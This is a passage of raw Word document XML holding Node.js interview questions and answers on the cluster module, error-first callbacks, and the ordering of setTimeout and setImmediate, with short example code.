        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc178383238"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How does Node.js support multi-processor platforms, and does it fully utilize all processor resources?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="010FE950" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Since Node.js is by default a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>single thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> application, it will run on a single processor core and will not take full advantage of multiple core resources. However, Node.js provides support for deployment on multiple-core systems, to take greater advantage of the hardware. The </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>Cluster</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> module is one of the core Node.js modules and it allows running multiple Node.js worker processes that will share the same port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239BF4A" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC7F662" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc178383239"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is typically the first argument passed to a Node.js callback handler?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="5C803DD4" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js core modules, as well as most of the community-published ones, follow a pattern whereby the first argument to any callback handler is an optional error object. If there is no error, the argument will be null or undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED0C8E7" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A typical callback handler could therefore perform error handling as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB82C6B" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D9276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function callback(err, results) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368CF14B" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D9276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usually we'll check for the error before handling results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58119DB7" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D9276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if(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC5CA8" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D9276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handle error somehow and return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB7771" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D9276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0481FECC" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D9276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no error, perform standard callback handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A189C4C" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763"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3357A3CC" w14:textId="5F63E7E4" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357541D5" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consider the following JavaScript code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B673C"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eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"first"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2964675A"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eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>() =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDDB998"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eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"second"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5425C426"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eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">}, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E2CE08"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eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"third"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6306D5C8" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The output will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844416F" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8F08C2" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>third</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434FAE41" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6ED04" w14:textId="4A41E606" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Assuming that this is the desired behavior, how else might we write this code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EF822D" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Way back when, Node.js version 0.10 introduced setImmediate, which is equivalent to setTimeout(fn, 0), but with some slight advantages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5661DC60" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setTimeout(fn, delay) calls the given callback fn after the given delay has ellapsed (in milliseconds). However, the callback is not executed immediately at this time, but added to the function queue so that it is executed </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>as soon as possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, after all the currently executing and currently queued event handlers have completed. Setting the delay to 0 adds the callback to the queue immediately so that it is executed as soon as all currently-queued functions are finished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03503B86" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setImmediate(fn) achieves the same effect, except that it doesn’t use the queue of functions. Instead, it checks the queue of I/O event handlers. If all I/O events in the current snapshot are processed, it executes the callback. It queues them immediately after the last I/O handler, somewhat like process.nextTick. This is faster than setTimeout(fn, 0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380845B1" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>So, the above code can be written in Node.js as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3066721E"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console.log("first");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534B912"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setImmediate(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ACCF04"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console.log("second");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EA060"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3CAB4723" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B"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console.log("third");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6833412A" w14:textId="77777777" w:rsidR="0001192B" w:rsidRPr="00DA2F32" w:rsidRDefault="0001192B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D96D54" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069E" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc178383240"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the preferred method of resolving unhandled exceptions in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="6D94F4D0" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
